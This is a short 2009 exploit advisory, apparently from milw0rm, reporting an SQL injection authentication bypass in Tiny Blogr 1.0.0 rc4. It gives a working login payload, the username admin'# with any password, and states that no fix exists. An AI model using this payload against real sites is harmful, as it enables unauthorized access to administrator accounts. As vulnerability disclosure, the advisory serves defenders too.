Tiny Blogr 1.0.0 rc4 Auth Bypass SQL Injection Vulnerability

Document Sample
Tiny Blogr 1.0.0 rc4 Auth Bypass SQL Injection Vulnerability Powered By Docstoc
					                         Tiny Blogr 1.0.0 rc4 Auth Bypass SQL Injection Vulnerability   Page 1/2
   1   *******     Salvatore "drosophila" Fresta   *******
   2
   3   [+] Application: Tiny Blogr
   4   [+] Version: 1.0.0 rc4
   5   [+] Website: http://tinyblogr.sourceforge.net
   6
   7   [+] Bugs: [A] Authentication Bypass
   8
   9   [+] Exploitation: Remote
  10   [+] Date: 17 Apr 2009
  11
  12   [+] Discovered by: Salvatore "drosophila" Fresta
  13   [+] Author: Salvatore "drosophila" Fresta
  14   [+] Contact: e−mail: drosophilaxxx@gmail.com
  15
  16
  17   *************************************************
  18
  19   [+] Menu
  20
  21   1) Bugs
  22   2) Code
  23   3) Fix
  24
  25
  26   *************************************************
  27
  28   [+] Bugs
  29
  30
  31   − [A] Authentication Bypass
  32
  33   [−] Risk: medium
  34   [−] Requisites: magic_quotes_gpc = off
  35   [−] File affected: class.eport.php
  36
  37   This bug allows a guest to bypass the authentication
  38   system.
  39
  40
  41   *************************************************
  42
  43   [+] Code
  44
  45
  46   − [A] Authenticaion Bypass
  47
  48   Username: admin’#
  49   Password: foo
  50
  51
  52   *************************************************
Salvatore Fresta                                                                        04/17/2009
                       Tiny Blogr 1.0.0 rc4 Auth Bypass SQL Injection Vulnerability   Page 2/2
  53
  54   [+] Fix
  55
  56   No fix.
  57
  58
  59   *************************************************
  60
  61   # milw0rm.com [2009−04−17]




Salvatore Fresta                                                                      04/17/2009

				
DOCUMENT INFO